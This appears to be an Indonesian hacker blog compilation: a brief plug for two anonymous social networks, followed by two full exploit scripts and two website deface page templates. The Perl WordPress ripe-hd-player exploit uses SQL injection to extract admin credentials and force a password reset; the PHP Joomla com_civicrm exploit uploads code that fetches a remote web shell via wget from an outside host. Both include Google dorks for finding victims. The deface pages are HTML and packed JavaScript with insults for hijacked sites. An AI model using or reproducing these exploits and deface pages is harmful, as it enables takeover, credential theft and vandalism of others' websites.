Anonymous (Facebook) Social Network

Yup, buat sobat2 yang bosan sosialisasi/komunikasi menggunakan jasa Facebook sekarang sobat dapat mencoba 2 situs jejaring sosial yang serupa dengan Facebook.
Yaitu :
1. [http://www.anonysocial.com/]
2. [http://socialnetwork.cyberdone.org/]

Anonysocial

AnonySocial

Masuk bergabung / daftar klik DISINI

============================================================

Socialnetwork Cyberdone

socialnetwork.cyberdone.org

Masuk bergabung / daftar klik DISINI

Ok Sob, Silahkan mencoba. Wasallam…

Injector Exploit Database (WordPress & Joomla)

1. WordPress hd-player 0day Exploit

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm Caddy-dz member from Inj3ct0r Team                 1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
   
####
 
# Exploit Title: WordPress hd-player 0day Exploit
 
# Author: Caddy-Dz
 
# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army
 
# E-mail: noface_x@hotmail.com
 
# Download : http://www.mediafire.com/?62orbd63loc6us0
 
# Category:: webapps
 
# Google Dork: inurl:"/wp-content/plugins/ripe-hd-player
 
# Security Risk: High
 
# Tested on: Ubuntu
 
####
 
#
 
# Greets : 1337day Team , NoFace, Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 , The Unknown , Fawzi Cold-Fire
 
# .. The Crazy 3D Team , Kha&mix , King Of Pirates , xDZx-Team ... and all Indonesian hackers .
 
#
 
# this was written for educational purpose only. use it at your own risk.
 
# author will be not responsible for any damage caused! user assumes all responsibility
 
# intended for authorized web application pentesting only!
 
 
 
 
 
#####################################################################################################
 
# >>> sqli vulnerability discovered in the same plugin and posted ; http://1337day.com/exploit/20199
 
# this exploit was written to develope this vulnerability to get full access of the wordpress script
 
# and bypassing the hash password into a constant password = caddy
 
#####################################################################################################
 
 
 
use IO::Socket;
 
use LWP::Simple;
 
use LWP::UserAgent;
 
 
 
system('cls');
 
system('color a');
 
   
 
   
 
if(@ARGV < 2)
 
{
 
print "[-]How To Use\n\n";
 
&help; exit();
 
}
 
sub help()
 
{
 
print "[+] usage1 : perl $0 site.com / \n";
 
print "[+] usage2 : perl $0 site.com /path/ \n";
 
print "[+] Note ! : do not use (http://) and leave space between the host and (/) \n or the path like the exemple";
 
}
 
   
 
print  "\n****************************************************\n";
 
print  "\n*                coded by Caddy-Dz                 *\n";
 
print  "\n*          email: noface_x[at]hotmail.com          *\n";
 
print  "\n* Fb Page: http://facebook.com/Algerian.Cyber.Army *\n";
 
print  "\*****************************************************\n";
 
($Target, $path,$file_vuln, $sql_query,) = @ARGV;
 
  
 
my $file_vuln = "/wp-content/plugins/ripe-hd-player/config.php?id=-3";
my $sql_query = '+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_login,0x3a,user_pass,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+wp_users--';
my $url = "http://" . $Target . $path . $file_vuln . $sql_query;
print "\n wait!!! \n\n";
 
   
 
my $request   = HTTP::Request->new(GET=>$url);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
 
my $response  = $useragent->request($request);
my ($username,$password);
if ($response->is_success) {
 
my $res   = $response->content;
if ($res =~ m/[#](.*):(.*)[#]/g) {
 
($username,$password) = ($1,$2);
 
print "[+] username and password :\n\n$username:$password \n\n";
 
}
 
else { print "[-] Error, Fail to get admin login.\n\n"; }
 
}
 
else { print "[-] Error, ".$response->status_line."\n\n";
 
}
 
 
 
 
 
my $activation = 'http://' . $Target . $path . 'wp-login.php?action=lostpassword';
sub post_url {
 
my( $activation, $formref ) = @_;
 
my $ua = new LWP::UserAgent(timeout => 300);
$ua->agent('perlproc/1.0');
my $get = $ua->post($activation, $formref );
}
 
my %param = ( 'user_login' => $username , 'wp-submit' => 'Get New Password' ); # you must change the parametre "Get New Password" if you're using other wordpress language version
 
print post_url( $activation, \%param );
 
 
my $sql_activation = "http://" . $Target . $path . "wp-content/plugins/ripe-hd-player/config.php?id=-3+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_activation_key,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+wp_users--";
my $request3   = HTTP::Request->new(GET=>$sql_activation);
 
my $useragent = LWP::UserAgent->new();
 
$useragent->timeout(10);
 
my $response2  = $useragent->request($request3);
my ($key);
if ($response2->is_success) {
 
my $res2   = $response2->content;
 
if ($res2 =~ m/[#](.*)[#]/g) {
 
($key) = ($1);
 
print "[+] user activation key : \n\n$key \n\n";
 
}
 
else { print "[-] Error, Fail to get user key.\n\n"; }
 
}
 
else { print "[-] Error, ".$response->status_line."\n\n";
 
}
 
 
my $link2 = "http://" . $Target . $path . "wp-login.php?action=rp&key=" . $key . "&login=" .$username;
use strict;
 
sub post_url {
 
my( $link2, $formref ) = @_;
 
my $ua2 = new LWP::UserAgent(timeout => 300);
 
 
 
$ua2->agent('perlproc/1.0');
 
 
 
my $get2 = $ua2->post($link2, $formref );
 
 
 
if( $get2->is_success ){
 
print "\nPassword bypassed and changed to => caddy \n";
 
} else {
 
print status_line;
 
 
 
}
 
}
my %param = ( 'pass1' => 'caddy', 'pass2' => 'caddy', 'wp-submit' => 'Reset Password' ); # you must change the parametre "Reset Password" if you're using other wordpress language version
 
print post_url( $link2, \%param );
 
# F2F77DA8172F8658   1337day.com [2013-05-21]   D97CD14F4A1FE01C #

==============================================================

2. Joomla component com_civicrm remote code injection vulnerability

# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
 
<?php
   
# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php
   
    
   
$options = getopt('u:f:');
   
if(!isset($options['u'], $options['f']))
die("\n        Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/    The full path to Joomla!
-f post.php             The name of the file to create.\n"); 
   
$url     =  $options['u'];
$file    =  $options['f'];
 
 
$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url   = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";
 
   
$data      = '<?php
 system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
 system("cp post.php ../../../../../../../tmp/post.php");
 system("cd ..; rm -rf tmp-upload-images");
 echo "by iskorpitx" ;
 fclose ( $handle );
 ?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
   
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>
 
# 2CF4D1BF882F7547   1337day.com [2013-05-21]   C248C940C9C6067B #

Wasallam…

Patah Hati dan Art – Script Deface

1. Patah Hati..

webhack 1

<html>
<title>Owned by H3RL4N0</title>
<link REL="SHORTCUT ICON" HREF="http://files.myopera.com/toejoehrupa/albums/3767112/Bendera.gif">
<br />
<script type='text/javascript'>
//<![CDATA[
msg = "...H3RL4N0 Was ";
msg = "Here..." + msg;pos = 0;
function scrollMSG() {
document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
if (pos > msg.length) pos = 0
window.setTimeout("scrollMSG()",80);
}
scrollMSG();
//]]></script>
<script type='text/javascript'>
var DADrightclicktheme = 'Dark';
var DADrightclickimage = 'https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/58165_603711969639228_1452959692_n.jpg';</script>
<script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script> 
<script type="text/javascript" src="http://cayunkatel.googlecode.com/files/rainbows.js"></script>

<style type="text/css">body {cursor:url("none"),default}</style>   
<body background="http://i1079.photobucket.com/albums/w515/raafi_teja/matrixrandom.gif">

</script>
 
<div id="matrix"><b> ................   T H I S . S I T E . G O T   ................</b></div>
<center><img src="http://img69.imageshack.us/edit_preview.php?l=img69/9695/maju.gif&action=rotate" /> <br />

<style type="text/css">body {
 
background: #000000;
 
font-family: Courier New;
 
color: #ff0000;
 
text-align: center;
 
}
 
a {
 
text-decoration:none;
 
color: 

#ff0000;
 
}
 
</style>

<script type="text/javascript">/*<![CDATA[*/
 
TypingText = function(element, interval, cursor, finishedCallback) {
 
if((typeof document.getElementById == 

"undefined") || (typeof element.innerHTML == "undefined")) {
 
this.running = true;
 
return;
 
}
 
this.element = element;
 
this.finishedCallback = (finishedCallback 

? finishedCallback : function() { return; });
 
this.interval = (typeof interval == "undefined" ? 100 : interval);
 
this.origText = this.element.innerHTML;
 
this.unparsedOrigText = this.origText;
 
this.cursor = (cursor ? cursor : "");
 
this.currentText = "";
 
this.currentChar = 0;
 
this.element.typingText = this;
 
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
 
TypingText.all.push(this);
 
this.running = false;
 
this.inTag = false;
 
this.tagBuffer = "";
 
this.inHTMLEntity = false;
 
this.HTMLEntityBuffer = "";
 
}
 
TypingText.all = new Array();
 
TypingText.currentIndex = 0;
 
TypingText.runAll 

= function() {
 
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
 
}
 
TypingText.prototype.run = function() {
 
if(this.running) return;
 
if(typeof this.origText == "undefined") {
 
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 
return;
 
}
 
if(this.currentText == "") this.element.innerHTML = "";
 
if(this.currentChar < this.origText.length) {
 
if(this.origText.charAt(this.currentChar) == "<" && 

!this.inTag) {
 
this.tagBuffer = "<";
 
this.inTag = true;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.origText.charAt(this.currentChar) == ">" && 

this.inTag) {
 
this.tagBuffer += ">";
 
this.inTag = false;
 
this.currentText += this.tagBuffer;
 
this.currentChar++;
 
this.run();
 
return;
 
} else 

if(this.inTag) {
 
this.tagBuffer += this.origText.charAt(this.currentChar);
 
this.currentChar++;
 
this.run();
 
return;
 
} else 

if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
 
this.HTMLEntityBuffer = "&";
 
this.inHTMLEntity = true;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
 
this.HTMLEntityBuffer += ";";
 
this.inHTMLEntity = 

false;
 
this.currentText += this.HTMLEntityBuffer;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.inHTMLEntity) {
 
this.HTMLEntityBuffer += 

this.origText.charAt(this.currentChar);
 
this.currentChar++;
 
this.run();
 
return;
 
} else {
 
this.currentText += this.origText.charAt(this.currentChar);
 
}
 
this.element.innerHTML = this.currentText;
 
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? 

this.cursor(this.currentText) : this.cursor) : "");
 
this.currentChar++;
 
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", 

this.interval);
 
} else {
 
this.currentText = "";
 
this.currentChar = 0;
 
this.running = false;
 
this.finishedCallback();
 
}
 
}
 
 
/*]]>*/</script>
<center><img src="http://4.bp.blogspot.com/-2h8LgjUDpzY/T0fTA4EQx8I/AAAAAAAAAtU/n_W5Vby8zLU/s400/hacked.gif" border="0"width="350px" height="60px">

<p id="message"><b> < By Hacker Patah Hati > </b><br>
<br> <b>===========================================
<span style="color: Red;">
<b><br>Surprise.. What the Fuck is happening with ur site, Lamers??</b></font><span style="color: red;">
<br />
<br> <b>Sorry Admin.. Your Security is Suck!! Please patch your system immediately..
<br> Theres nothing important here.. nothing but heartbreak!! </b>
</font>
<br />
<br>
<span style="color: Red;">
<br>Well.. I Hope You'll enjoy the Music, Less Hahahaaaa..<br></font>
<center><img src="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/58165_603711969639228_1452959692_n.jpg" height="320px"></center>

</center>

<div style="text-shadow: 0px 0px 5px white;">
<span style="color: red;">
<b>Greetz To: </b><marquee scrollamount="10" direction="left" width="50%">|| NOFACE || IFC || ANONYMOUS || HMEI7 || ISD || R10 || & All Indonesian Underground Hackers ||
</marquee>

<script type="text/javascript">/*<![CDATA[*/
 
new TypingText(document.getElementById("message"), 50, function(i){ var ar = new Array("_", "-", " ", "_", "-", " "); return " " + 

ar[i.length % ar.length]; });
 
 
//Type out examples:
 
TypingText.runAll();
 
/*]]>*/</script>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
</body>
</html>

2. Seni (Art)

webhack2

<html>

<title> H3RL4N0 WAS HERE.. </title>
<link rel="SHORTCUT ICON" href="http://files.myopera.com/toejoehrupa/albums/3767112/Bendera.gif">


<script language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script><script language="javascript" type="text/javascript" src="http://onehackoranother.com/projects/jquery/jquery-grab-bag/javascripts/jquery.text-effects.js"></script>

   <style type="text/css">body, td, th { font-family:"Courier New", Courier, monospace;font-size: 12px; color: #FF0000; margin:0; padding:0; height:100%; overflow:hidden;}html { height:100%; width:100%;}body { background-color: #000000;}.teks { color:#FFOOOO; font-size:74px; font-weight:bold; font:"Times New Roman";}.teks2 { color:#FF0000; font-size:24px; font-weight:bold; font:"Times New Roman";}#i12 { position:absolute; top:30%; left:35%;}.theAbs { top:0; position:absolute; width:2%;}.hide { display:none;}#iHacked { position:absolute; width:100%; top:5%; height:100%; opacity:0.3;}li{ color:#fff; font:bold 13px; list-style: none;}</style><script language="javascript" type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('i 9;$.8.7=n(b){i c={P:10,Q:2,F:10,1y:v,1h:v,19:\'1z\',C:\'1a\',K:r,G:r,D:v};k(!b)b=c;i d=$.1Z(c,b);9=$.8.7.1A();E 1B.20(n(){i a=$(1B);k(d.D){d.1C={Z:a.g(\'Z\'),11:a.g(\'11\'),12:a.g(\'12\'),s:a.g(\'s\'),l:a.g(\'l\'),y:a.g(\'y\'),1D:a.g(\'t-u\'),1E:a.g(\'z-1F\')}}a.g(\'Z\',\'21\');d.1G=a.g(\'t-u\');1i(d.C){A\'1b\':$.8.7.1j(a,d);B;A\'1k\':$.8.7.1l(a,d);B;A\'13\':$.8.7.1m(a,d);B;A\'14\':$.8.7.1n(a,d);B;22:$.8.7.1o(a,d)}})};$.8.7.1A=n(){i h,w;k(1p 1q.1H!=\'1r\'){h=1q.1H;w=1q.23}H k(1p T.16!=\'1r\'&&1p T.16.1c!=\'1r\'&&T.16.1c!=0){h=T.16.1c;w=T.16.1I}H{h=T.1J(\'I\')[0].1c;w=T.1J(\'I\')[0].1I}i a={q:1s 1t(h,R.V(h/2),R.V(h/5)),m:1s 1t(w,R.V(w/2),R.V(w/5))};E a};$.8.7.j=n(a,b,c){k(a&&b&&(b>a)){i d=a;a=b;b=d}k(a==b)E a;i e=R.V(R.1a()*a);k(b&&e<b){1u(e<b)e=R.V(R.1a()*a)}E c?e-c:e};$.8.7.K=n(){i a=\'24\';i b=\'\';1u(b.25<6)b+=a.26($.8.7.j(6));E b};$.8.7.1v=n(){i a,l;i b=$.8.7.j(4)+1;1u(b>4)b=$.8.7.j(4)+1;1i(b){A 1:a=$.8.7.j(9.q[0]-9.q[1],9.q[1]-9.q[2]);l=$.8.7.j(9.m[1]);B;A 2:a=$.8.7.j(9.q[0],9.q[1]+9.q[2]);l=$.8.7.j(9.m[0]+9.m[1],9.m[1]+9.m[2]);B;A 3:a=$.8.7.j(9.q[2],0,9.q[1]);l=$.8.7.j(9.m[0]+9.m[1],9.m[1]+9.m[2]);B;A 4:a=$.8.7.j(9.q[2],0,9.q[1]);l=$.8.7.j(9.m[1]-9.m[2],0,9.m[2]);B}E 1s 1t(a,l)};$.8.7.W=n(a,b,c,d,e){i f,t;k(d.1y)f=$.8.7.j(d.F);H f=d.F;k(d.1h)t=d.19;H t=a.g(\'t-u\');a.1w({27:\'1d%\',1e:0,l:c,s:b,28:t},(f*29),n(){$.8.7.U(a,d,e-1)})};$.8.7.U=n(a,b,c){a.g(\'t-u\',b.1G);k(c>0){a.g(\'11\',\'2a\');a.1w({1e:1d},1);a.g(\'12\',\'\');k(b.K)a.g(\'y\',$.8.7.K())}H k(c<=0){k(b.D){i d=b.1C;a.1w({1e:1d},1);a.g(\'1e\',\'1d\');a.g(\'Z\',d.Z);a.g(\'11\',d.11);a.g(\'12\',d.12);a.g(\'s\',d.s);a.g(\'l\',d.l);a.g(\'y\',d.y);a.g(\'t-u\',d.1D);a.g(\'z-1F\',d.1E)}k(b.G){a.2b()}E r}1i(b.C){A\'1b\':a.g(\'s\',9.q[1]);a.g(\'l\',9.m[1]);$.8.7.1j(a,b,c);B;A\'1k\':i e=$.8.7.1v();a.g(\'s\',e[0]);a.g(\'l\',e[1]);$.8.7.1l(a,b,c);B;A\'13\':a.g(\'s\',0);a.g(\'l\',$.8.7.j(9.m[0]));$.8.7.1m(a,b,c);B;A\'14\':a.g(\'s\',9.q[0]);a.g(\'l\',$.8.7.j(9.m[0]));$.8.7.1n(a,b,c);B;A\'1a\':a.g(\'s\',0);a.g(\'l\',0);$.8.7.1o(a,b,c);B}};$.8.7.1o=n(a,b,c){i d,s,1f,1g;k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}d=$.8.7.j(9.m[0]);s=$.8.7.j(9.q[0]);a.g(\'s\',s);a.g(\'l\',d);1f=$.8.7.j(9.m[0],9.m[2]);1g=$.8.7.j(9.q[0],9.q[2]);d=($.8.7.j(2)%2==0)?(d-1f):(d+1f);s=($.8.7.j(2)%2==0)?(s-1g):(s+1g);$.8.7.W(a,s,d,b,c)};$.8.7.1j=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}i d=$.8.7.1v();$.8.7.W(a,d[0],d[1],b,c)};$.8.7.1l=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}$.8.7.W(a,9.q[1],9.m[1],b,c)};$.8.7.1m=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}i d=$.8.7.j(3);k(a.1K(\'J\').1L(\'2c\')>=0)d=a.g(\'l\');H k(d==1)d=a.g(\'l\')+$.8.7.j(9.m[2]);H k(d==2)d=a.g(\'l\')-$.8.7.j(9.m[2]);H d=a.g(\'l\');i e=$.8.7.j((9.q[0]+9.q[2]),9.q[0]);$.8.7.W(a,e,d,b,c)};$.8.7.1n=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}i d=$.8.7.j(3);k(a.1K(\'J\').1L(\'2d\')>=0)d=a.g(\'l\');H k(d==1)d=a.g(\'l\')+$.8.7.j(9.m[2]);H k(d==2)d=a.g(\'l\')-$.8.7.j(9.m[2]);H d=a.g(\'l\');i e=$.8.7.j(9.q[2],0,9.q[1]);$.8.7.W(a,e,d,b,c)};$.8.7.2e=n(){i a={C:\'1b\',F:10,Q:2,P:6,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1M" N="t-u:Y;y:#1N">.</p>\')}$(\'.1M\').7(a)};$.8.7.2f=n(){i a={C:\'1b\',F:3,1O:1,1P:1,D:r,G:v};L(i x=0;x<2g;x++){$(\'I\').M(\'<p J="1Q" N="t-u:Y;y:#17\'+(x%2==0?\'17\':\'18\')+\'18">\'+(x%2==0?\'0\':\'1\')+\'</p>\')}$(\'.1Q\').7(a)};$.8.7.2h=n(){i a={C:\'1k\',F:10,1O:2,1P:6,D:r,19:\'2i\',G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1R" N="t-u:2j;y:#2k">.</p>\')}$(\'.1R\').7(a)};$.8.7.2l=n(){i a={C:\'13\',F:10,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1S" N="t-u:2m;y:#1N">*</p>\')}$(\'.1S\').7(a)};$.8.7.2n=n(){i a={C:\'13\',F:3,K:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1T" N="t-u:Y;y:#1U">\\\'</p>\')}$(\'.1T\').7(a)};$.8.7.2o=n(){i a={C:\'13\',F:6,K:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1V" N="t-u:Y;y:#\'+(x%2==0?\'18\':\'17\')+\'2p">&#2q;<1x />&#2r;<1x />&#2s<1x />&#2t</p>\')}$(\'.1V\').7(a)};$.8.7.2u=n(){i a={C:\'14\',F:6,K:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1W" N="t-u:Y;y:#17\'+(x%2==0?\'17\':\'18\')+\'18">^</p>\')}$(\'.1W\').7(a)};$.8.7.2v=n(){i a={C:\'14\',Q:1,P:1,F:15,K:v,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1X" N="t-u:Y">O</p>\')}$(\'.1X\').7(a)};$.8.7.2w=n(a){i a={C:\'14\',19:\'1z\',K:r,1h:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1Y" N="t-u:2x;y:#1U">\'+(x%2==0?\'O\':\'o\')+\'</p>\')}$(\'.1Y\').7(a)}',62,158,'|||||||fly|fn|fly_dimensions|||||||css||var|getRandomValue|if|left|Width|function|||Height|false|top|font|size|true|||color||case|break|movement|reset|return|rotationSpeed|destroy|else|body|class|randomColor|for|append|style||maxRotations|minRotations|Math|75|document|resetObj|floor|animateObj||12pt|position||visibility|display|fall|float||documentElement|FF|00|maxTextSize|random|explode|clientHeight|100|opacity|move_left|move_top|expandText|switch|moveExplode|implode|moveImplode|moveFall|moveFloat|moveRandom|typeof|window|undefined|new|Array|while|getRandomQuadrent|animate|br|rotationRandom|8em|getBrowserDimensions|this|oldCss|fontsize|zindex|index|originalFont|innerHeight|clientWidth|getElementsByTagName|attr|indexOf|fly_starfield|FFF|minRotation|maxRotation|fly_explode|fly_hole|fly_blizzard|fly_rain|ff00|fly_matrix|fly_fire|fly_balloons|fly_bubble|extend|each|absolute|default|innerWidth|0369CEF|length|charAt|width|fontSize|1000|visible|remove|_rain|_fire|starfield|explosion|50|blackhole|1px|5em|ff0|blizzard|14pt|rain|matrix|FF00|165|167|182|163|fire|balloons|bubbles|8pt'.split('|'),0,{}));$(document).ready(function(){$('#i1').fadeIn(5000).animate( { fontSize:"1px" } , 2000 ).fadeOut(); $.fn.fly.bubbles(); sumpahPemuda();});function bacaDuluOm(){alert("Thanks To Riki N.M"); return false;}function sumpahPemuda(){ setTimeout(function(){$('#sp1').typewriter().fadeIn();}, 7000); setTimeout(function(){$('#sp2').typewriter().fadeIn();}, 11000); setTimeout(function(){$('#sp3').typewriter().fadeIn();}, 23000); setTimeout(function(){$('#sp4').typewriter().fadeIn();}, 35000); setTimeout(function(){$('.explode').fly({movement:'float',randomColor:true,destroy:true});}, 48000); setTimeout(function(){$.fn.fly.explosion();}, 50000); setTimeout(function(){hacked();$('#theCredits').fadeIn();animate();}, 45000); }function hacked(){ setTimeout(function(){$('#iHacked').fadeIn(1000);}, 500); setTimeout(function(){$('#iHacked').fadeOut();}, 1000); setTimeout(function(){hacked()});}function stayHere(){ self.focus();return false;}</script></head><body onunload="bacaDuluOm();">

   <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <br><br><tr> <td align="center"><div id="iHacked" class="hide"><br><br>
           <img src="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/58165_603711969639228_1452959692_n.jpg" alt="indonesiatechnologi.co.cc" width="598" height="447" longdesc="http://indonesiatechnologi.co.cc"></div>
   <br><div id="i1" class="teks" style="display:none">Uppz!! I'm So Sorry.. </div><br>
   <div id="sp2" class="hide teks explode">This Site Got Hacked </div><br>

   <div id="sp2" class="hide teks2 explode"><span style="background-color:#000000; font-family:verdana, arial, 'sans serif';">SURPRISE... YOU MOTHER FUCKER! </span><br> 
     </div><br>
     <div id="sp3" class="hide teks2 explode">There's nothing important here.. but Heartbreak!!! </div>
     <br>
     <div id="sp4" class="hide teks2 explode">CONTACT ME AT : H3RL4N0@FACEBOOK.COM </div>

     <br><div id="sp5" class="hide teks2 explode"></div><br><ul id="theCredits" style="display:none"><li> by H3RL4N0</li><li> Come Back</li><li> Indonesian Anonymous</li><li> Hack is Art</li><li> Fuck You</li><li> Hahahahaa.. </li><li> Indonesian Anonymous</li><li> h3rl4n0</li><li> Jakarta </li><li> Defacer </li><li> Hack is Art</li><li> Single Attacker</li><li> NOFACE</li></ul></td> </tr></table></body><br><br><script language="javascript" type="text/javascript">var x = new Array();var y = new Array();var z = new Array();var items = $('li');function animate(){ for(i = items.length - 1; i >= 0; i--){ var xVar = 50 + x[i];var yVar = 50 + y[i] * z[i]++;var zVar = 10 * z[i]++;if (!xVar | xVar < 0 | xVar > 90| yVar < 0 | yVar > 90 | zVar < 0 | zVar > 1500){x[i]= Math.random() * 2 - 1;y[i] = Math.random() * 2 - 1;z[i] = 2; }else{$(items[i]).css("position", "absolute");$(items[i]).css("top", xVar+"%");$(items[i]).css("left", yVar+"%");$(items[i]).css("fontSize", zVar+"%");$(items[i]).css("opacity",(zVar)/5000);}}setTimeout(animate, 9);}</script></html><br>by H3RL4N0<br/></font></td> </tr></table> </font></td> </tr> <tr> <td>&nbsp;</td> </tr> </table></td> </tr> <tr> <td colspan="2"><div align="center"><font size="2" face="Arial, Helvetica, sans-serif"></font></div></td> </tr> </table></td> </tr></table><body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'></body></html>

Wasallam…